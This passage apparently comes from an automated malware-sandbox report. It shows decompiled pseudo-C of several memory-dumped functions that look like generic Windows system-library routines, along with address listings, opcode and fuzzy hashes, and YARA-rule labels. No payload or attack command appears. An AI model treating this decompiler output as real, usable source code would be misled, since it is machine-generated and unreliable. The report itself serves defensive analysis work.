									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04D195D0();
										L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000d02b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xd02bb802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04D0F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                            0x04cd52a5
                                                                                            0x04cd52ad
                                                                                            0x04cd52b0
                                                                                            0x04cd52b3
                                                                                            0x04cd52b7
                                                                                            0x04cd52ba
                                                                                            0x04cd52bf
                                                                                            0x04cd52c4
                                                                                            0x04cd52cc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cd52ce
                                                                                            0x04cd52d1
                                                                                            0x04cd52d9
                                                                                            0x04cd52dd
                                                                                            0x04cd52e7
                                                                                            0x04cd52f7
                                                                                            0x04cd52f9
                                                                                            0x04cd52fd
                                                                                            0x04d30dcf
                                                                                            0x04d30dd5
                                                                                            0x04d30dd6
                                                                                            0x04d30dd7
                                                                                            0x04d30dd8
                                                                                            0x04d30dd9
                                                                                            0x04d30dde
                                                                                            0x04d30ddf
                                                                                            0x04d30de0
                                                                                            0x04d30de1
                                                                                            0x04d30de2
                                                                                            0x04d30de2
                                                                                            0x04d30de5
                                                                                            0x04d30dea
                                                                                            0x04d30dec
                                                                                            0x04d30f60
                                                                                            0x04d30f64
                                                                                            0x04d30f70
                                                                                            0x04d30f76
                                                                                            0x04d30f79
                                                                                            0x04d30f79
                                                                                            0x00000000
                                                                                            0x04d30f64
                                                                                            0x04d30df2
                                                                                            0x04d30df7
                                                                                            0x04d30e04
                                                                                            0x04d30e04
                                                                                            0x04d30e0d
                                                                                            0x04d30e0d
                                                                                            0x04d30e10
                                                                                            0x04d30e1a
                                                                                            0x04d30e1c
                                                                                            0x04d30e4c
                                                                                            0x04d30e52
                                                                                            0x04d30e61
                                                                                            0x04d30e67
                                                                                            0x04d30e6b
                                                                                            0x04d30e70
                                                                                            0x04d30e76
                                                                                            0x04d30ed7
                                                                                            0x04d30edc
                                                                                            0x04d30ee0
                                                                                            0x04d30ee6
                                                                                            0x04d30eea
                                                                                            0x04d30eed
                                                                                            0x04d30ef0
                                                                                            0x04d30ef3
                                                                                            0x04d30ef6
                                                                                            0x04d30ef9
                                                                                            0x04d30efb
                                                                                            0x04d30efe
                                                                                            0x04d30f01
                                                                                            0x04d30f01
                                                                                            0x04d30f0b
                                                                                            0x04d30f12
                                                                                            0x04d30f16
                                                                                            0x04d30f18
                                                                                            0x04d30f18
                                                                                            0x04d30f1b
                                                                                            0x04d30f2c
                                                                                            0x04d30f31
                                                                                            0x04d30f31
                                                                                            0x04d30f35
                                                                                            0x04d30f39
                                                                                            0x04d30f3a
                                                                                            0x04d30f3c
                                                                                            0x04d30f3c
                                                                                            0x04d30f3f
                                                                                            0x04d30f50
                                                                                            0x04d30f55
                                                                                            0x04d30f55
                                                                                            0x04d30f59
                                                                                            0x04cd52eb
                                                                                            0x04cd52f1
                                                                                            0x04cd52f1
                                                                                            0x04d30e7d
                                                                                            0x04d30e84
                                                                                            0x04d30e88
                                                                                            0x04d30e8a
                                                                                            0x04d30e8a
                                                                                            0x04d30e8d
                                                                                            0x04d30e9e
                                                                                            0x04d30ea3
                                                                                            0x04d30ea3
                                                                                            0x04d30ea7
                                                                                            0x04d30eaf
                                                                                            0x04d30eb3
                                                                                            0x04d30eb9
                                                                                            0x04d30eb9
                                                                                            0x04d30ebc
                                                                                            0x04d30ecd
                                                                                            0x04d30ecd
                                                                                            0x00000000
                                                                                            0x04d30eb3
                                                                                            0x04d30e1e
                                                                                            0x04d30e21
                                                                                            0x04d30e25
                                                                                            0x04d30e2b
                                                                                            0x04d30e2f
                                                                                            0x04d30e30
                                                                                            0x04d30e3a
                                                                                            0x04d30e3f
                                                                                            0x04d30e41
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d30e47
                                                                                            0x00000000
                                                                                            0x04d30e47
                                                                                            0x04d30df9
                                                                                            0x04d30dfe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d30dfe
                                                                                            0x04cd5303
                                                                                            0x04cd5307
                                                                                            0x00000000
                                                                                            0x04cd5309
                                                                                            0x00000000
                                                                                            0x04cd5309
                                                                                            0x04cd5307
                                                                                            0x04cd52e9
                                                                                            0x04cd52e9
                                                                                            0x00000000
                                                                                            0x04cd52e9
                                                                                            0x04cd530e
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f380e455a445fd347b7353c10567dd4aad7c4e9691cdd59c789086c55229212a
                                                                                            • Instruction ID: a634ac05bbdbb059aab3a619d39309b8251cdfa11e724c67c122f77cf895f564
                                                                                            • Opcode Fuzzy Hash: f380e455a445fd347b7353c10567dd4aad7c4e9691cdd59c789086c55229212a
                                                                                            • Instruction Fuzzy Hash: A151EA70205742ABE322EF29C840B27BBE6FF40714F14491EF59587650EB74F808DBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D02AE4, Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D02AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4dc8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4dc8208; // 0x4dc8207
				_t8 = _t57 + 0x4dc8208; // 0x4dc8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4dc8450; // 0xd0173a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4dc821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4dc6d5c; // 0x7f450654
							_t72 =  *0x4dc6d5c; // 0x7f450654
							_t75 =  *0x4dc6d5c; // 0x7f450654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4dc6d5c; // 0x7f450654
							_t84 =  *0x4dc6d5c; // 0x7f450654
							_t87 =  *0x4dc6d5c; // 0x7f450654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04D1F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                            0x04d02ae4
                                                                                            0x04d02aec
                                                                                            0x04d02aef
                                                                                            0x04d02af4
                                                                                            0x04d02af7
                                                                                            0x04d02afd
                                                                                            0x04d02b92
                                                                                            0x04d02b92
                                                                                            0x04d02b97
                                                                                            0x04d02b9c
                                                                                            0x04d02b9c
                                                                                            0x04d02b03
                                                                                            0x04d02b06
                                                                                            0x04d02b09
                                                                                            0x04d02b09
                                                                                            0x04d02b0f
                                                                                            0x04d02b15
                                                                                            0x04d02b15
                                                                                            0x04d02b1b
                                                                                            0x04d02b1e
                                                                                            0x04d02b21
                                                                                            0x04d02b26
                                                                                            0x04d02b29
                                                                                            0x04d02b81
                                                                                            0x04d02b84
                                                                                            0x04d02c0e
                                                                                            0x04d02c15
                                                                                            0x04d02c24
                                                                                            0x04d02c24
                                                                                            0x04d02b8a
                                                                                            0x04d02b8a
                                                                                            0x04d02b8a
                                                                                            0x04d02b8a
                                                                                            0x04d02b90
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02b4a
                                                                                            0x04d02b4a
                                                                                            0x04d02b4d
                                                                                            0x04d02b53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02b55
                                                                                            0x04d02b58
                                                                                            0x04d02bb7
                                                                                            0x04d45d1b
                                                                                            0x04d45d37
                                                                                            0x04d45d47
                                                                                            0x04d45d53
                                                                                            0x04d02bbd
                                                                                            0x04d02bbd
                                                                                            0x04d02bbd
                                                                                            0x04d02bb7
                                                                                            0x04d02b5d
                                                                                            0x04d02c2f
                                                                                            0x04d45d5b
                                                                                            0x04d45d77
                                                                                            0x04d45d87
                                                                                            0x04d45d93
                                                                                            0x04d02c35
                                                                                            0x04d02c35
                                                                                            0x04d02c35
                                                                                            0x04d02c2f
                                                                                            0x04d02b65
                                                                                            0x04d02b9f
                                                                                            0x04d02ba2
                                                                                            0x04d02b67
                                                                                            0x04d02b67
                                                                                            0x04d02b69
                                                                                            0x04d02b6b
                                                                                            0x04d02b6e
                                                                                            0x04d02bc9
                                                                                            0x04d02bcc
                                                                                            0x04d02bcf
                                                                                            0x04d02bd4
                                                                                            0x04d02bd6
                                                                                            0x04d02bd6
                                                                                            0x04d02bdb
                                                                                            0x04d02c02
                                                                                            0x04d02c05
                                                                                            0x04d02c07
                                                                                            0x00000000
                                                                                            0x04d02c07
                                                                                            0x04d02be0
                                                                                            0x04d02c00
                                                                                            0x04d02c3f
                                                                                            0x04d02c3f
                                                                                            0x00000000
                                                                                            0x04d02c00
                                                                                            0x04d02be5
                                                                                            0x04d02be7
                                                                                            0x04d02bec
                                                                                            0x04d02bf4
                                                                                            0x04d02bf6
                                                                                            0x00000000
                                                                                            0x04d02bf6
                                                                                            0x04d02b70
                                                                                            0x04d02b76
                                                                                            0x04d02b2b
                                                                                            0x04d02b2b
                                                                                            0x04d02b2d
                                                                                            0x04d02b2f
                                                                                            0x04d02b32
                                                                                            0x04d02b35
                                                                                            0x04d02b3a
                                                                                            0x00000000
                                                                                            0x04d02b40
                                                                                            0x04d02b43
                                                                                            0x04d02b45
                                                                                            0x04d02b47
                                                                                            0x04d02b4a
                                                                                            0x04d02b4d
                                                                                            0x04d02b53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02b53
                                                                                            0x04d02b78
                                                                                            0x04d02b78
                                                                                            0x04d02b7b
                                                                                            0x04d02b7e
                                                                                            0x00000000
                                                                                            0x04d02b7e
                                                                                            0x04d02b76
                                                                                            0x04d02ba5
                                                                                            0x04d02ba5
                                                                                            0x04d02ba8
                                                                                            0x04d02bad
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02baf
                                                                                            0x04d02baf
                                                                                            0x04d02bc2
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ce33b5c1b183aefd834ecc8e44e3f2ebc0c806e1448c076589d5edb3e6fa9558
                                                                                            • Instruction ID: 9d5c3f0bc6fff06ea3e4efb6f4a2e97bbf0650f472d3faa3ef0c6441c7098062
                                                                                            • Opcode Fuzzy Hash: ce33b5c1b183aefd834ecc8e44e3f2ebc0c806e1448c076589d5edb3e6fa9558
                                                                                            • Instruction Fuzzy Hash: 95519076B011268B8B14DF18C898ABDB7F1FB88700715C59AE8469B394E734FE51DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9AE44, Relevance: .2, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E04D9AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04D9C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04D9ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E04D9FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E04D9EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04CF7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04D91608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04DA1536(0x4dc8ae4, (_t74 -  *0x4dc8b04 >> 0x14) + (_t74 -  *0x4dc8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L04D9C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E04D9A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E04D7CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E04D9ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                            0x04d9ae44
                                                                                            0x04d9ae4c
                                                                                            0x04d9ae53
                                                                                            0x04d9ae55
                                                                                            0x04d9ae5c
                                                                                            0x04d9ae64
                                                                                            0x04d9ae68
                                                                                            0x04d9ae75
                                                                                            0x04d9ae75
                                                                                            0x04d9ae78
                                                                                            0x04d9ae7a
                                                                                            0x04d9ae7c
                                                                                            0x04d9ae7f
                                                                                            0x04d9aea8
                                                                                            0x04d9aeab
                                                                                            0x04d9aead
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9aeb3
                                                                                            0x04d9aeb8
                                                                                            0x04d9aebb
                                                                                            0x04d9aebd
                                                                                            0x00000000
                                                                                            0x04d9ae81
                                                                                            0x04d9ae88
                                                                                            0x04d9ae8f
                                                                                            0x04d9ae9b
                                                                                            0x04d9ae96
                                                                                            0x04d9ae96
                                                                                            0x04d9ae96
                                                                                            0x04d9aea0
                                                                                            0x04d9aea3
                                                                                            0x04d9aebf
                                                                                            0x04d9aebf
                                                                                            0x04d9aec3
                                                                                            0x04d9aec9
                                                                                            0x04d9af0d
                                                                                            0x04d9af14
                                                                                            0x04d9af3d
                                                                                            0x04d9af3d
                                                                                            0x04d9af41
                                                                                            0x04d9af44
                                                                                            0x04d9af67
                                                                                            0x04d9af67
                                                                                            0x04d9af6a
                                                                                            0x04d9afca
                                                                                            0x04d9afd1
                                                                                            0x00000000
                                                                                            0x04d9afd1
                                                                                            0x04d9af6c
                                                                                            0x04d9af6d
                                                                                            0x04d9af75
                                                                                            0x04d9af7c
                                                                                            0x04d9af7e
                                                                                            0x04d9af80
                                                                                            0x04d9af85
                                                                                            0x04d9af87
                                                                                            0x04d9af99
                                                                                            0x04d9af89
                                                                                            0x04d9af92
                                                                                            0x04d9af92
                                                                                            0x04d9af9e
                                                                                            0x04d9afa1
                                                                                            0x04d9afa3
                                                                                            0x04d9afa9
                                                                                            0x04d9afb0
                                                                                            0x04d9afb2
                                                                                            0x04d9afb4
                                                                                            0x04d9afbc
                                                                                            0x04d9afbc
                                                                                            0x04d9afb4
                                                                                            0x04d9afb0
                                                                                            0x00000000
                                                                                            0x04d9afa1
                                                                                            0x04d9af4f
                                                                                            0x04d9af57
                                                                                            0x04d9af5c
                                                                                            0x04d9af5e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9af60
                                                                                            0x04d9af64
                                                                                            0x04d9af64
                                                                                            0x00000000
                                                                                            0x04d9af64
                                                                                            0x04d9af1a
                                                                                            0x04d9af25
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9af27
                                                                                            0x04d9af28
                                                                                            0x04d9af33
                                                                                            0x00000000
                                                                                            0x04d9aed0
                                                                                            0x04d9aed0
                                                                                            0x04d9aed2
                                                                                            0x04d9aee1
                                                                                            0x04d9aee4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9aee6
                                                                                            0x04d9aeec
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9aefb
                                                                                            0x04d9af07
                                                                                            0x04d9afd3
                                                                                            0x04d9afdb
                                                                                            0x04d9afdb
                                                                                            0x00000000
                                                                                            0x04d9af07
                                                                                            0x04d9aed6
                                                                                            0x04d9aed8
                                                                                            0x04d9aedf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d9aedf
                                                                                            0x04d9aec9

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 677eca0f54b29840755f24fc89550de0e543e13fc327d94404af267e529286e2
                                                                                            • Instruction ID: 9a3fab81ce77ee24a923eededf57d99e0859698b5c385ec68cd52f7153b19633
                                                                                            • Opcode Fuzzy Hash: 677eca0f54b29840755f24fc89550de0e543e13fc327d94404af267e529286e2
                                                                                            • Instruction Fuzzy Hash: 9F41A0B27002919BDF269E25C894B2BB3DAFF84724F04421AF856C7790DB34FC01D6A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CFDBE9, Relevance: .1, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E04CFDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04CDCC50(E04CD4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04CF7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04DA8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04CF2280(_t58, _v44);
						E04CFDD82(_v44, _t102, _t98);
						E04CFB944(_t102, _v5);
						return E04CEFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4dc8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4dc862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4dc8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4dc862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4d9fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                            0x04cfdbe9
                                                                                            0x04cfdbf2
                                                                                            0x04cfdbf7
                                                                                            0x04cfdbf9
                                                                                            0x04cfdbfc
                                                                                            0x04cfdc00
                                                                                            0x04cfdc03
                                                                                            0x04cfdc14
                                                                                            0x04cfdd54
                                                                                            0x04cfdd54
                                                                                            0x04cfdd54
                                                                                            0x04cfdc18
                                                                                            0x04cfdc1d
                                                                                            0x04cfdc1d
                                                                                            0x04cfdc32
                                                                                            0x04cfdc3b
                                                                                            0x04cfdc3e
                                                                                            0x04cfdc46
                                                                                            0x04cfdd5b
                                                                                            0x04cfdd62
                                                                                            0x04cfdd64
                                                                                            0x04cfdd67
                                                                                            0x04cfdd69
                                                                                            0x04cfdd6b
                                                                                            0x04cfdd6e
                                                                                            0x04cfdd70
                                                                                            0x04cfdd73
                                                                                            0x04cfdd73
                                                                                            0x00000000
                                                                                            0x04cfdc4c
                                                                                            0x04cfdc4e
                                                                                            0x04d43ae3
                                                                                            0x04d43ae8
                                                                                            0x04d43aea
                                                                                            0x04cfdce7
                                                                                            0x04cfdce9
                                                                                            0x04cfdcec
                                                                                            0x04cfdcee
                                                                                            0x04cfdcf0
                                                                                            0x04cfdcf3
                                                                                            0x04cfdcf5
                                                                                            0x04d43af2
                                                                                            0x04d43af5
                                                                                            0x04d43af5
                                                                                            0x04cfdd06
                                                                                            0x04cfdd08
                                                                                            0x04cfdd0b
